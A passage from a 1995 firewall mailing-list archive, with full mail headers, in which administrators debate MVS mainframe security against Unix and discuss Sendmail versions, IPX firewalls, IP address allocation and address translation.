the 9 MVS shops I've worked in all were protected by non-hackable security software called ACF2. Perhaps an employee could plant back doors thinking he/she could use them undetected in the future. Well, no can do. SMF records *everything* that occurs in MVS. So you turn off SMF recording. Difficult because to do so you must run "authorized." Which means your program must be in the link and apf lists; and adding your programs to those lists... well, it goes on and on. Now all of this isn't to say that someone couldn't write a program to, say, steal raw data straight from a disk via TCP/IP. But what thrill is that? Nay, hacking MVS (or trying to) is a waste of time. ITEM 2: ==> How many MVS systems are plugged directly into the internet? How many ==> are actually used for TCP/IP related services? Mine is. We receive data continously, all day long, via TCP/IP from a third party vendor (can't be more specific). I can FTP from my MVS to/from our UNIX. I have no idea of how *many* MVS machines there are on the internet, but a rough guess would be "alot." And I know that you know, MVS is the core backbone for Client Server. Who d'ya think the Server is? ==> (Where's my Mosaic for MVS? :-) It works like this: You download lots of MVS data to your unix/os2/windoze/dos whereupon it immediately populates Web pages, Mosaics, (whatever) and you use your unix/os2/windoze/dos presentation services (which really beat MVS's) to display the data. Bang! Zoom! Real client/server. ITEM 3: ==> IMHO, Suns ... ==> -- were designed with being useful in mind. Now I know you didn't *mean* this the way it sounds. :-) As a 14 year veteran of MVS all I can say is, UNIX is the latest and greatest and always will be. There simply is *** NO WAY *** a Sun box can match the throughput, data capacity, and multi-user capabilities of MVS. Right now there are some 536 users on my production system alone. We have three test and one development partitions that I didn't even check. And the users are doing *real* company work. If my MVS crashed (don't worry it won't, never does) the company may as well close for the day. Would your company shut down for the day if you lost your Sun box? I lurk on firewalls to learn; MVS and Unix have their futures tied together. On the internet, computers are supposed to be "open" to everybody, for free. Well MVS was never designed to be that way. So the bigdogs want to open up their systems "like the internet." So they buy Suns to put all the data "on the internet." But now they want security. Well they had security. But they want to give away the data. But with security. Well, what do they want? We (MVS) don't need firewalls. We have trusted security that has been around for 20+ years. (Eons in computer time.) We use a userid and password method to logon, with security based on the userid to object relationship. My wonderment is, why are Suns (Unix, etc) so desperately trying to do all the right things that MVS does, but in a catch-up kind of way. Do you take backups daily, weekly, monthly, yearly? ALL THE TIME? DAILY? NEVER MISS A DAY? Larry :-) From firewalls-owner Tue Sep 12 12:17:06 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA12508 for firewalls-outgoing; Tue, 12 Sep 1995 11:38:23 -0700 Received: from osshe.edu (OSSHE.EDU [140.211.10.20]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA12494 for ; Tue, 12 Sep 1995 11:38:10 -0700 Received: from sparky.oit.osshe.edu (sparky.OIT.OSSHE.EDU [140.211.71.3]) by osshe.edu (8.6.5/8.6.5) with ESMTP id LAA06533; Tue, 12 Sep 1995 11:36:28 -0700 Received: from ip-davin.oit.osshe.edu (ip-davin.oit.osshe.edu [140.211.84.203]) by sparky.oit.osshe.edu (8.6.12/8.6.12) with SMTP id LAA16592; Tue, 12 Sep 1995 11:34:06 -0700 Date: Tue, 12 Sep 1995 11:34:44 -0900 (PDT) From: Davin Petersen To: Christian Kuhtz cc: Ken Dayton , Firewalls@GreatCircle.COM Subject: Re: Secure version of Sendmail X-Sender: davin@mail.oit.osshe.edu In-Reply-To: <199509121736.MAA14128@psisa.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Tue, 12 Sep 1995, Christian Kuhtz wrote: > The state-of-the-art Sendmail V8 can be found at ftp://ftp.cs.berkeley.edu/ucb/sendmail. Bugs are fixed immediately. Sendmail is > quasi public domain (check the license out for details). Right! However stay away from anything less than 8.6.12. The other versions have security holes. Davin Petersen Oregon Institute of Technology Unix Admin/Student From firewalls-owner Tue Sep 12 12:36:35 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA14983 for firewalls-outgoing; Tue, 12 Sep 1995 12:27:28 -0700 Received: from armitage.cyberspace.com (armitage.cyberspace.com [199.2.48.15]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id MAA14964 for ; Tue, 12 Sep 1995 12:27:23 -0700 From: billcurr@cyberspace.com Received: from case.cyberspace.com by armitage.cyberspace.com (4.1/SMI-4.1) id AA07736; Tue, 12 Sep 95 12:24:13 PDT Received: from 198.68.52.182 (PPP52-182.cyberspace.com) by case.cyberspace.com (4.1/SMI-4.1) id AA24905; Tue, 12 Sep 95 12:25:04 PDT Date: Tue, 12 Sep 95 12:25:03 PDT Message-Id: <9509121925.AA24905@case.cyberspace.com> Subject: Re: firewall with only one IP address ??? To: firewalls@GreatCircle.COM X-Mailer: AIR Mail 3.X (SPRY, Inc.) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk The bummer with that is, (as UUNET just informed me this morning) is if I ever switch providers or dump UUNET, they want their 256 IP adresses BACK. >Agreed with Don: > >What's the deal? A class C will give you 256 IP addresses and most >corporations can qualify for this. Maybe you should go to some of the >larger ISPs if you're having a problem. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- "Printmaker gone digital" billcurr@cyberspace.com http://www.cyberspace.com/billcurr -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- From firewalls-owner Tue Sep 12 13:13:10 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA15030 for firewalls-outgoing; Tue, 12 Sep 1995 12:29:29 -0700 Received: from relay2.UU.NET (relay2.UU.NET [192.48.96.7]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id MAA15023 for ; Tue, 12 Sep 1995 12:29:25 -0700 Received: from rssi by relay2.UU.NET with SMTP id QQzgxh24247; Tue, 12 Sep 1995 15:28:07 -0400 Received: from rapid.rssi.com by rssi (4.1/SMI-4.1) id AA04894; Tue, 12 Sep 95 15:26:06 EDT Received: by rapid.rssi.com (5.0/SMI-SVR4) id AA01068; Tue, 12 Sep 1995 15:28:00 +0500 Date: Tue, 12 Sep 1995 15:28:00 +0500 From: bvvanor@rssi.rssi.com (Brad VanOrden) Message-Id: <9509121928.AA01068@rapid.rssi.com> To: BEHUBBA@bass.rssi.com, firewalls@greatcircle.com Subject: Re: IPX firewall? Content-Length: 204 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk It should be noted that this firewall will be between two internal Novell segments. If anyone knows of something that can help us, it will be greatly appreciated. Brad Van Orden Rapid Systems Solutions From firewalls-owner Tue Sep 12 13:15:11 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA14617 for firewalls-outgoing; Tue, 12 Sep 1995 12:19:36 -0700 Received: from rock.cis.ufl.edu (rock.cis.ufl.edu [128.227.224.19]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id MAA14607 for ; Tue, 12 Sep 1995 12:19:30 -0700 Received: by rock.cis.ufl.edu (8.6.12/cis.ufl.edu) id PAA15922; Tue, 12 Sep 1995 15:18:10 -0400 Message-Id: <199509121918.PAA15922@rock.cis.ufl.edu> From: seeger@cis.ufl.edu (F. L. Charles Seeger III) Date: Tue, 12 Sep 1995 15:18:10 -0400 In-Reply-To: gregg@smtpgate.Disclosure.COM <9508128109.AA810939662@smtpgate.disclosure.com> X-Mailer: Mail User's Shell (7.2.5 10/14/92) To: Firewalls@GreatCircle.COM Subject: Re: Interpreting CERT advisories Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Sorry, but I skimmed over this in the original message. | ==> (Where's my Mosaic for MVS? :-) Well, it's neither Mosaic nor MVS, but there is a www MF client: www://www.nerdc.ufl.edu/pub/vm/www/index.html ftp://ftp.nerdc.ufl.edu/pub/vm/www/albert.vmarc132 This is the README for "Albert" version 1.3.x (formerly named UF-WWW). Albert is a fullscreen web browser from the University of Florida for IBM 3270 terminals (or emulations). Albert runs on IBM's VM/CMS mainframe operating system. Albert is essentially an Xedit macro that uses the the CERN linemode WWW client to get the source for files and then does its own formatting (including HTML parsing). ... A public-access demonstration is available on the Internet by making a tn3270 connection to nermvs.nerdc.ufl.edu. You'll be presented a menu, in which you should select (or type in the word) UFINFO. ... I don't know whether or not it is firewalls/socks/proxy friendly. 8-) Regards, Chuck From firewalls-owner Tue Sep 12 13:28:20 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA15237 for firewalls-outgoing; Tue, 12 Sep 1995 12:31:51 -0700 Received: from real.com (eagle.real.com [199.97.122.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id MAA15228 for ; Tue, 12 Sep 1995 12:31:46 -0700 Date: Tue, 12 Sep 1995 19:31:56 GMT From: bret@real.com (Bret McDanel) Received: by real.com (8.6.12/3.2.012693-Realistic Technologies Inc); id TAA06249 for firewalls@greatcircle.com; Tue, 12 Sep 1995 19:31:56 GMT Message-Id: <199509121931.TAA06249@real.com> To: firewalls@greatcircle.com Subject: Re: Secure version of Sendmail X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > On Tue, 12 Sep 1995, Christian Kuhtz wrote: > > > The state-of-the-art Sendmail V8 can be found at ftp://ftp.cs.berkeley.edu/ucb/sendmail. Bugs are fixed immediately. Sendmail is > > quasi public domain (check the license out for details). > > Right! However stay away from anything less than 8.6.12. The other > versions have security holes. and 8.6.12 doesnt use syslog? There is no secure version.. there are only more secure versions.. This is not totally the fault of any sendmail, as the case with syslog.. From firewalls-owner Tue Sep 12 13:32:41 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA16345 for firewalls-outgoing; Tue, 12 Sep 1995 12:57:45 -0700 Received: from eagle.twinds.com (eagle.twinds.com [206.27.30.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id MAA16332 for ; Tue, 12 Sep 1995 12:57:40 -0700 Received: from hawk.twinds.com by eagle.twinds.com with SMTP (1.37.109.16/16.2) id AA117345758; Tue, 12 Sep 1995 15:55:58 -0400 Date: Tue, 12 Sep 1995 15:56:29 -0400 (EDT") From: Arley Carter X-Sender: ac@hawk.twinds.com To: Davin Petersen Cc: Christian Kuhtz , Ken Dayton , Firewalls@GreatCircle.COM Subject: Re: Secure version of Sendmail In-Reply-To: Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Excuse me for being dense but......... Since when did sendmail become secure? In case your wondering, I am *not* trying to start a Dr. Fred flame war. I'm just curious, what do you mean by secure? Or am I missing something? Has something new happened to sendmail that I don't know about? -arc Arley Carter Tradewinds Technologies, Inc ac@hawk.twinds.com www: http://www.twinds.com On Tue, 12 Sep 1995, Davin Petersen wrote: > On Tue, 12 Sep 1995, Christian Kuhtz wrote: > > > The state-of-the-art Sendmail V8 can be found at ftp://ftp.cs.berkeley.edu/ucb/sendmail. Bugs are fixed immediately. Sendmail is > > quasi public domain (check the license out for details). > > Right! However stay away from anything less than 8.6.12. The other > versions have security holes. > > Davin Petersen > Oregon Institute of Technology > Unix Admin/Student > From firewalls-owner Tue Sep 12 13:42:16 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA17338 for firewalls-outgoing; Tue, 12 Sep 1995 13:13:19 -0700 Received: from psisa.com ([198.3.200.13]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id NAA17331 for ; Tue, 12 Sep 1995 13:13:14 -0700 Received: (from chk@localhost) by psisa.com (8.6.12/guess) id PAA18274; Tue, 12 Sep 1995 15:10:26 -0500 Message-Id: <199509122010.PAA18274@psisa.com> Subject: Re: Secure version of Sendmail To: ac@hawk.twinds.com (Arley Carter) Date: Tue, 12 Sep 1995 15:10:26 -0500 (CDT) Cc: firewalls@greatcircle.com In-Reply-To: from "Arley Carter" at Sep 12, 95 03:56:29 pm From: chk@psa.pencom.com (Christian Kuhtz) X-Mailer: ELM [version 2.4 PL24] Content-Type: text Content-Length: 1428 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Excuse me for being dense but......... Since when did sendmail become > secure? In case your wondering, I am *not* trying to start a Dr. Fred > flame war. I'm just curious, what do you mean by secure? > Or am I missing something? Has something new happened to sendmail that > I don't know about? Ask secure as an as complex program as Sendmail V8 can probably be (considering the history). At any rate, if you don't trust Sendmail V8, wrap it using SMAP from the TIS toolkit. Which is probably your best bet in that case anyways due to the nature of Sendmail. Your only chance is to try to stay as up to date as possible with regards to new releases of Sendmail V8 -- common sense IMHO. Eric Allman has done a fabulous job as far as security is concerned. MHO. Note: I'm talking specifically about Sendmail V8. Everything else is definitely a lot more than just a firehazard. Regards, Chris --___ ____ __ | _ \/ __/| \ Christian Kuhtz +1 914-684-4467 | _/\__ \| \ \ Pencom System Administration Services fax: +1 914-684-3791 |_| /___/|_|__\ on-location at Advantis/IBM Global Network, White Plains, NY Best Regards, Chris --___ ____ __ | _ \/ __/| \ Christian Kuhtz +1 914-684-4467 | _/\__ \| \ \ Pencom System Administration Services fax: +1 914-684-3791 |_| /___/|_|__\ on-location at Advantis/IBM Global Network, White Plains, NY From firewalls-owner Tue Sep 12 14:14:51 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA18742 for firewalls-outgoing; Tue, 12 Sep 1995 13:48:33 -0700 Received: from tera.bctel.net (tera.bctel.net [204.174.66.253]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id NAA18733 for ; Tue, 12 Sep 1995 13:48:29 -0700 Received: (from nobody@localhost) by tera.bctel.net (8.6.10/8.6.10) id NAA17642; Tue, 12 Sep 1995 13:46:50 -0700 Received: from mocha.bctel.net(204.174.66.5) by tera via smap (V1.3) id sma017639; Tue Sep 12 13:46:29 1995 Received: (from murrell@localhost) by mocha.bctel.net (8.6.10/8.6.10) id NAA19619; Tue, 12 Sep 1995 13:43:57 -0700 Date: Tue, 12 Sep 1995 13:43:57 -0700 From: Brian Murrell Message-Id: <199509122043.NAA19619@mocha.bctel.net> To: firewalls@GreatCircle.COM, billcurr@cyberspace.com Subject: Re: firewall with only one IP address ??? X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > The bummer with that is, (as UUNET just informed me this morning) is if I ever > switch providers or dump UUNET, they want their 256 IP adresses BACK. go get your own 256 host class c and then have uunet route that. b. -- Brian J. Murrell murrell@bctel.net BCTel Advanced Communications brian@ilinx.com Vancouver, B.C. brian@wimsey.com 604 454 5262 From firewalls-owner Tue Sep 12 14:16:20 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA18087 for firewalls-outgoing; Tue, 12 Sep 1995 13:37:03 -0700 Received: from eagle.twinds.com (eagle.twinds.com [206.27.30.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id NAA18078 for ; Tue, 12 Sep 1995 13:36:56 -0700 Received: from hawk.twinds.com by eagle.twinds.com with SMTP (1.37.109.16/16.2) id AA117448126; Tue, 12 Sep 1995 16:35:26 -0400 Date: Tue, 12 Sep 1995 16:35:56 -0400 (EDT") From: Arley Carter X-Sender: ac@hawk.twinds.com To: Christian Kuhtz Cc: firewalls@greatcircle.com Subject: Re: Secure version of Sendmail In-Reply-To: <199509122010.PAA18274@psisa.com> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Tue, 12 Sep 1995, Christian Kuhtz wrote: > Ask secure as an as complex program as Sendmail V8 can probably be (considering > the history). At any rate, if you don't trust Sendmail V8, wrap it using SMAP My point exactly. Sendmail fails the First Law of Computer Security miserably. This law espoused by Cheswick and Bellovin, Bell Labs is The security, reliability and bugginess of a program is inversely related to the programs size and complexity. In that light, I query sendmail secure? How?....... In what context do you mean secure? Surely this is an oxymoron. That being said I am delivering this mail with sendmail, latest version of sendmail "certified" by hp for hpux. ;-) Regards: -arc Arley Carter Tradewinds Technologies, Inc. ac@hawk.twinds.com www: http://www.twinds.com From firewalls-owner Tue Sep 12 14:32:48 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA19626 for firewalls-outgoing; Tue, 12 Sep 1995 14:03:50 -0700 Received: from translation.com (pao.translation.com [204.30.204.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id OAA19617 for ; Tue, 12 Sep 1995 14:03:45 -0700 Received: (from audit@localhost) by translation.com (8.6.12/8.6.12) id OAA04235; Tue, 12 Sep 1995 14:02:23 -0700 Date: Tue, 12 Sep 1995 14:02:23 -0700 Message-Id: <199509122102.OAA04235@translation.com> Received: from harley.translation.com(204.30.204.114) by pao via smap (V1.3mjr) id sma004233; Tue Sep 12 14:01:42 1995 X-Sender: afoss@pao X-Mailer: Windows Eudora Light Version 1.5.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: "Bradley E. Hubbard" , "'smtp:firewalls@greatcircle.com'" From: Andrew Foss Subject: Re: IPX firewall? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 08:23 AM 9/12/95 -0700, Bradley E. Hubbard wrote: > >Hello, > >I'm wondering if anyone knows of any firewall products that have been >developed in and for an IPX environment? Internet Junction(recently purchased by Cisco) has a gateway that converts IPX to IP. It's available for Solaris, HP-UX, IRX ... It has the advantage of not putting TCP stacks on the IPX clients, but it's not the right solution for many people. 1. TCP stacks are now free and Win95 and all that jive from Redmond will have it included. 2. The IJ product still requires a dll on all the PC's. 3. Compatability in gatewaying the 2 unlike protocols seems to be a continual challenge. 4. It has to run as an application on a machine which will need to be adequately secured itself. 5. Performance is limited. I don't want to offend anyone, but I think the right solution is just let the IPX clients live in the IP world as opposed to trying to gateway their protocols. > >Thanks in advance, > >Brad Hubbard >behubba@rssi.com > > Andrew Foss Tel. 415/494-NETS(6387) Network Translation Inc. Dir. 415/855-0725 1901 Embarcadero Rd. FAX 415/424-9110 Palo Alto, CA 94303 email afoss@translation.com web www.translation.com From firewalls-owner Tue Sep 12 15:05:35 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA21447 for firewalls-outgoing; Tue, 12 Sep 1995 14:49:34 -0700 Received: from telemann.inoc.dl.nec.com (telemann.inoc.dl.nec.com [143.101.112.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id OAA21439 for ; Tue, 12 Sep 1995 14:49:29 -0700 Received: by telemann.inoc.dl.nec.com (8.6.12/YDL1.9.1-940729.15) id QAA26279(telemann.inoc.dl.nec.com); Tue, 12 Sep 1995 16:48:08 -0500 Received: by texas.syl.dl.nec.com (8.6.12/YDL1.9.1-940729.15) id QAA19628(texas.syl.dl.nec.com); Tue, 12 Sep 1995 16:48:07 -0500 To: firewalls@GreatCircle.com Date: 12 Sep 95 21:47:51 GMT From: cornell@syl.dl.nec.com (Cornell Kinderknecht) Message-ID: Organization: CSTC - NEC Systems Lab., Irving (Dallas), TX Path: syl.dl.nec.com!syl.dl.nec.com!cornell Reply-To: cornell@syl.dl.nec.com Subject: New SOCKS WWW page Newsgroups: necus.internet.mirror.firewalls Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Just a short note to let people know about the new SOCKS home page at: http://www.socks.nec.com/ --- Cornell -- | Cornell Kinderknecht Email: cornell@syl.dl.nec.com | | CSTC | | NEC Systems Lab. Phone: 214-518-3509 | | Irving, TX (Dallas) | From firewalls-owner Tue Sep 12 15:13:56 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA20827 for firewalls-outgoing; Tue, 12 Sep 1995 14:32:57 -0700 Received: from Disclosure.COM (di.disclosure.com [205.156.194.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id OAA20820 for ; Tue, 12 Sep 1995 14:32:51 -0700 Received: by Disclosure.COM (4.1/SMI-4.1) id AA00330; Tue, 12 Sep 95 17:34:32 EDT Date: Tue, 12 Sep 1995 17:34:30 -0400 (EDT) From: Scott Barman To: gregg@smtpgate.Disclosure.COM Cc: Firewalls@Greatcircle.COM Subject: Re: Re: Interpreting CERT advisories In-Reply-To: <9508128109.AA810939662@smtpgate.disclosure.com> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Tue, 12 Sep 1995 gregg@smtpgate.Disclosure.COM wrote: > Jet - (J.Eric Townsend-jet@abulafia.genmagic.com) writes: > > ==> How many MVS systems are plugged directly into the internet? How many > ==> are actually used for TCP/IP related services? (Where's my Mosaic for > ==> MVS? :-) > ==> IMHO, Suns get broken into all the time because: > ==> -- everybody has one to practice on > ==> -- they were designed with being useful in mind. > > ITEM 1: > > ==> IMHO, Suns get broken into all the time because: > ==> -- everybody has one to practice on > > Excuse me?!? MVS has been *in production* since the late 70's; abundantly > installed around the World. IMHO, plenty of time/opportunity for hackers to > try hacking in. The reason you don't hear about hackers hacking MVS is The question then to add is how long has MVS been running with a TCP/IP stack and supporting connections to the internet. > because, well, you can't. Much too difficult. In the 9 MVS shops I've worked > in all were protected by non-hackable security software called ACF2. Perhaps ACF2 is breakable... I can introduce you to someone who does it on a regular basis. I am not saying it's easy, but it is not impenetratable. Yes, it's a well done service for the MVS environment, but it is not perfect. > adding your programs to those lists... well, it goes on and on. Now all of > this isn't to say that someone couldn't write a program to, say, steal raw > data straight from a disk via TCP/IP. But what thrill is that? Nay, hacking > MVS (or trying to) is a waste of time. Can you say "corporate espionage?" The person who I mentioned above used to be involved with that. It's not a waste of time for those looking for corporate secrets! > ITEM 2: > > ==> How many MVS systems are plugged directly into the internet? How many > ==> are actually used for TCP/IP related services? > > Mine is. We receive data continously, all day long, via TCP/IP from a third > party vendor (can't be more specific). I can FTP from my MVS to/from our UNIX. > I have no idea of how *many* MVS machines there are on the internet, but a > rough guess would be "alot." And I know that you know, MVS is the core > backbone for Client Server. Who d'ya think the Server is? It is??? Since when?? > ==> (Where's my Mosaic for MVS? :-) > > It works like this: You download lots of MVS data to your unix/os2/windoze/dos > whereupon it immediately populates Web pages, Mosaics, (whatever) and you use > your unix/os2/windoze/dos presentation services (which really beat MVS's) to > display the data. Bang! Zoom! Real client/server. Typical batch processing mentality that keeps me in business suggessting massively parrallel systems to replace mainframe repositories. Real client server is more than downloading data and kludging a read request. Mosaic/Netscape and the like get this info in "real time" and display it as it comes in. Not "down load it, start the reader process and display it watching this directory for more to come in an populate this directory." Even M$ SQL Server works better than that!! > ITEM 3: > > ==> IMHO, Suns ... > ==> -- were designed with being useful in mind. > > Now I know you didn't *mean* this the way it sounds. :-) As a 14 year veteran > of MVS all I can say is, UNIX is the latest and greatest and always will be. > There simply is *** NO WAY *** a Sun box can match the throughput, data > capacity, and multi-user capabilities of MVS. Right now there are some 536 > users on my production system alone. We have three test and one development > partitions that I didn't even check. And the users are doing *real* company > work. If my MVS crashed (don't worry it won't, never does) the company may as > well close for the day. Would your company shut down for the day if you lost > your Sun box? I wouldn't do it with a Sun either. I would be looking into Pyramid or Tandon, or someone else. Heck, I'd replace a mainframe with an SGI Onyx before I would consider a Sun (and I have a lot of gripes with IRIX!). > I lurk on firewalls to learn; MVS and Unix have their futures tied together. MVS is dying. There are fewer and fewer jobs out there for MVS people and many are running scared. As a parttime instructor in a Unix/C certification program, more than 70% of the students I have taught were mainframers who either had to learn Unix because their company was migrating to it or they needed to learn it because the job market it moving in that direction. > On the internet, computers are supposed to be "open" to everybody, for free. Oh yea? Do you see the connection bills? > Well MVS was never designed to be that way. So the bigdogs want to open up That's right... and that's the problem with MVS and the internet--the system wasn't designed for it. And I know for a fact that the system you are talking about is nearly croaking under it's current TCP/IP load and cannot support another system making TCP/IP requests without the addition of specialized hardware. How secure is that hardware, especially when it's running a TCP/IP stack?? > their systems "like the internet." So they buy Suns to put all the data "on > the internet." But now they want security. Well they had security. But they > want to give away the data. But with security. Well, what do they want? We Give? I'll leave the rest to private email! :-) scott barman -- scott barman DISCLAIMER: I speak to anyone who will listen, scott@disclosure.com and I speak only for myself. barman@ix.netcom.com "Micro$oft and Windoze/NT will be the cause of the de-evolution of network security just as the original PC and BASIC was the cause of the de-evolution of programming." From firewalls-owner Tue Sep 12 15:30:28 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA22785 for firewalls-outgoing; Tue, 12 Sep 1995 15:16:58 -0700 Received: from translation.com (pao.translation.com [204.30.204.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id PAA22778 for ; Tue, 12 Sep 1995 15:16:55 -0700 Received: (from audit@localhost) by translation.com (8.6.12/8.6.12) id PAA04556; Tue, 12 Sep 1995 15:15:25 -0700 Date: Tue, 12 Sep 1995 15:15:25 -0700 Message-Id: <199509122215.PAA04556@translation.com> Received: from harley.translation.com(204.30.204.114) by pao via smap (V1.3mjr) id sma004552; Tue Sep 12 15:14:38 1995 X-Sender: afoss@pao X-Mailer: Windows Eudora Light Version 1.5.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Brian Murrell , firewalls@GreatCircle.COM, billcurr@cyberspace.com From: Andrew Foss Subject: Re: firewall with only one IP address ??? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk If you share registered IP addresses and NEVER permanently assign them to your network and hosts, this is a non-issue. If CIDR or any other reason comes along and changes your IP addresses, you only need to update the shared global pool, and never renumber your whole net! At 01:43 PM 9/12/95 -0700, Brian Murrell wrote: > >> The bummer with that is, (as UUNET just informed me this morning) is if I ever >> switch providers or dump UUNET, they want their 256 IP adresses BACK. > >go get your own 256 host class c and then have uunet route that. > >b. > >-- >Brian J. Murrell murrell@bctel.net >BCTel Advanced Communications brian@ilinx.com >Vancouver, B.C. brian@wimsey.com >604 454 5262 > > Andrew Foss Tel. 415/494-NETS(6387) Network Translation Inc. Dir. 415/855-0725 1901 Embarcadero Rd. FAX 415/424-9110 Palo Alto, CA 94303 email afoss@translation.com web www.translation.com From firewalls-owner Tue Sep 12 16:32:41 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA25697 for firewalls-outgoing; Tue, 12 Sep 1995 16:04:19 -0700 Received: from motgate.mot.com (motgate.mot.com [129.188.136.100]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id QAA25690 for ; Tue, 12 Sep 1995 16:04:13 -0700 Received: from pobox.mot.com (pobox.mot.com [129.188.137.100]) by motgate.mot.com (8.6.11/8.6.10/MOT-3.8) with ESMTP id SAA03933 for ; Tue, 12 Sep 1995 18:02:55 -0500 Received: from po_box.cig.mot.com (po_box.cig.mot.com [136.182.15.5]) by pobox.mot.com (8.6.11/8.6.10/MOT-3.8) with ESMTP id SAA01775 for ; Tue, 12 Sep 1995 18:02:54 -0500 Message-Id: <199509122305.TAA00271@po_box.cig.mot.com> Received: (lehman@localhost) by bongo.cig.mot.com (8.6.11/SCERG-1.12C) id SAA25209; Tue, 12 Sep 1995 18:02:53 -0500 Date: Tue, 12 Sep 1995 18:02:53 -0500 (CDT) From: D Matthew Lehman X-Sender: lehman@bongo To: firewalls@GreatCircle.COM Subject: A little different use for a firewall X-Favorite-Ultimate-Team: Flying Lentils Footer: "D. M. Lehman, IL27-3B6, Motorola Inc., Arlington Heights, IL 60004" Priority: Normal Organization: Motorola Cellular Infrastructure Group MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I'm kind of new to setting up firewalls, so I wanted to gather other opinions on how to solve this problem. Scenario: I have a device with several IP addresses. All the interfaces insist on being 128.0.0.xxx (I know this is wrong, but this is what I'm trying to work around). I need to connect the device to the rest of our network and allow the device to be accessed from the "normal" side of the network. Hosts on the "normal network" need to think that the device is on a legal subnet and the device needs to be able to send packets back. I need all packets to go through, not just IP. Security is not so much a concern as functionality. My thought was to put some sort of firewall in place to do address translation for lack of a better term (see diagram). My question is: Is this possible with a single machine acting as a firewall, or is it even possible with two machines acting as a firewall? +----------+ | Goofy | 128.0.0.1 +-------------+ "Normal Network" | Device |-----------+ | | | | 128.0.0.2 | 128.0.0.10 | Firewall | 191.1.2.1 | |-----------+-------------------| |----------->> | | 128.0.0.3 | | | | |-----------+ +-------------+ +----------+ or..... +----------+ | Goofy | 128.0.0.1 | Device |-----------+ +------------------+ | | 128.0.0.2 | 128.0.0.10 | | | |-----------+---------------| Firewall #1 | | | 128.0.0.3 | | | | |-----------+ +------------------+ +----------+ | 180.1.1.1 | | 180.1.1.2 +------------------+ 192.1.2.1 | | <<------------| Firewall #2 | | | +------------------+ Any advice is appreciated. D. Matthew Lehman Email: lehman@cig.mot.com Inter-Networking Team Phone: 708.632.3426 Motorola Cellular Infrastructure Group FAX: 708.632.6658 From firewalls-owner Tue Sep 12 17:02:56 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA27465 for firewalls-outgoing; Tue, 12 Sep 1995 16:42:55 -0700 Received: from safety.worldcom.com (safety.worldcom.com [198.64.193.5]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id QAA27458 for ; Tue, 12 Sep 1995 16:42:52 -0700 Received: (from smtp@localhost) by safety.worldcom.com (8.6.11/8.6.9) id SAA10150 for ; Tue, 12 Sep 1995 18:35:30 -0500 Received: from worldcom-18.worldcom.com(198.64.193.9) by safety.worldcom.com via smap (V1.3) id sma010100; Tue Sep 12 18:34:51 1995 Received: by worldcom-18.worldcom.com (IBM OS/2 SENDMAIL VERSION 1.3.13/3.3) id AA5181; Tue, 12 Sep 95 18:32:53 -0700 Message-Id: <9509130132.AA5181@worldcom-18.worldcom.com> Received: from worldcom with 